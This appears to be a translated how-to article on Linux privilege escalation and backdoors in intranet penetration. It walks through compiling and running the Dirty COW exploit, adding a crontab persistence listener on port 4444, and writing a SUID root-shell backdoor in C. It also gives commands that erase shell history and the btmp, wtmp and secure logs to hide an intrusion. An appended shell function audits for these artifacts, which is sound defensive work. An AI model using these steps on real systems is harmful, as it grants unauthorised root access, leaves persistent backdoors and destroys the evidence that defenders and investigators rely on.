2025-01-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
This article covers "how to use privilege escalation and backdoor implantation in intranet penetration". Many people run into this kind of situation when working through real cases, so let the editor walk you through how to handle it. Read carefully and you should come away with something useful.
Linux privilege escalation and backdoor implantation
1. Reproducing the Dirty COW vulnerability
(1) Open the web page and copy the code of dirty.c, then create a .c file with touch, open it in vi or vim, paste the code and save it.
(https://github.com/FireFart/dirtycow/blob/master/dirty.c cannot be downloaded directly from Kali with wget, because that downloads the entire web page rather than the source file (tested personally).)
(2) In the shell, download the file from the Apache service running on Kali
(3) Compile the 1.c file
gcc -pthread 1.c -o dirty -lcrypt
(4) Run the compiled file
./dirty   or   ./dirty <custom password>
Remember to restore from the backup password.bak (overwrite the modified file with it) after testing.
(5) Switch to the rewritten administrator account (privilege escalation succeeds)
2. Crontab scheduled tasks
(1) Edit /etc/crontab with vim (only possible with administrator privileges): vim /etc/crontab
(2) After a restart, port 4444 is listening
(3) The machine can now be controlled
3. SUID privilege escalation (once privileges have been escalated successfully a single time, this is equivalent to leaving a backdoor that keeps them)
(1) Create a suid.c file (editing on the target machine is too awkward, so I edit it on Kali and then download it with wget)
#include <stdlib.h>
#include <unistd.h>
int main(void) { setuid(0); system("/bin/bash"); return 0; }
(2) Download suid.c with wget
(3) Compile suid.c with gcc
gcc suid.c -o suid
(4) Change the permissions of suid to set the SUID bit (whoever executes the file then runs it with the identity of the administrator who owns it)
(5) After the target machine reboots, ./suid can be executed directly to escalate privileges (no password is required)
4. Linux trace removal
(1) Clear the history of the current user only: history -c
(2) Stop the system from saving command history: vi /etc/profile, find the HISTSIZE value and change it to 0
Deleting records
(3) Delete the failed-login records: echo > /var/log/btmp
(4) Delete the successful-login records: echo > /var/log/wtmp (if you run the last command at this point, you will find that there are no records)
(5) Delete the log records: echo > /var/log/secure
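From the defender's side, each step in sections 2 to 4 leaves an artifact that can be checked for directly. The shell function below is an added example, not part of the original article: the name audit_host, the finding labels and the 384-byte utmp record size (glibc Linux) are assumptions of this example, and the cron and SUID checks are heuristics whose output needs review.

```shell
#!/bin/sh
# Added example, not from the article. audit_host ROOT prints one finding per
# line; ROOT is / on a live host, or the mount point of a disk image.
UTMP_RECORD=384   # assumption: sizeof(struct utmp) on glibc Linux

audit_host() {
    root=${1%/}
    # Section 3: set-uid files outside the usual system binary directories.
    find "${root:-/}" -xdev -type f -perm -4000 \
        ! -path "$root/usr/*" ! -path "$root/bin/*" ! -path "$root/sbin/*" \
        2>/dev/null | sed 's/^/SUID_REVIEW /'
    # Section 2: /etc/crontab job lines other than the distribution's
    # run-parts entries (heuristic; legitimate local jobs also show up).
    if [ -r "$root/etc/crontab" ]; then
        sed -E -e '/^[[:space:]]*(#|$|[A-Za-z_]+=)/d' -e '/run-parts/d' \
            -e 's/^/CRON_REVIEW /' "$root/etc/crontab"
    fi
    # Section 4 (2): command history disabled system-wide.
    if grep -Eqs '^[[:space:]]*(export[[:space:]]+)?HISTSIZE=0[[:space:]]*$' \
        "$root/etc/profile"; then
        echo "HISTSIZE_ZERO $root/etc/profile"
    fi
    # Section 4 (3)-(4): "echo > file" leaves one newline byte, so a binary
    # login log is no longer a whole number of utmp records.
    for f in wtmp btmp; do
        p=$root/var/log/$f
        [ -f "$p" ] || continue
        size=$(wc -c < "$p")
        [ $((size % UTMP_RECORD)) -eq 0 ] || echo "LOGIN_LOG_CLOBBERED $p"
    done
    # Section 4 (5): the text auth log reduced to at most one byte.
    p=$root/var/log/secure
    if [ -f "$p" ] && [ "$(wc -c < "$p")" -le 1 ]; then
        echo "TEXT_LOG_EMPTY $p"
    fi
    return 0
}

# Run only when a root path is given on the command line.
if [ $# -gt 0 ]; then audit_host "$1"; fi
```

An empty btmp (no failed logins yet) or a freshly rotated log is normal, which is why a zero-byte login log is not reported and an empty text log is only marked for review.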
That concludes "how to use privilege escalation and backdoor implantation in intranet penetration". Thank you for reading. If you want to know more about the industry, you can follow the website; the editor will publish more high-quality practical articles for you!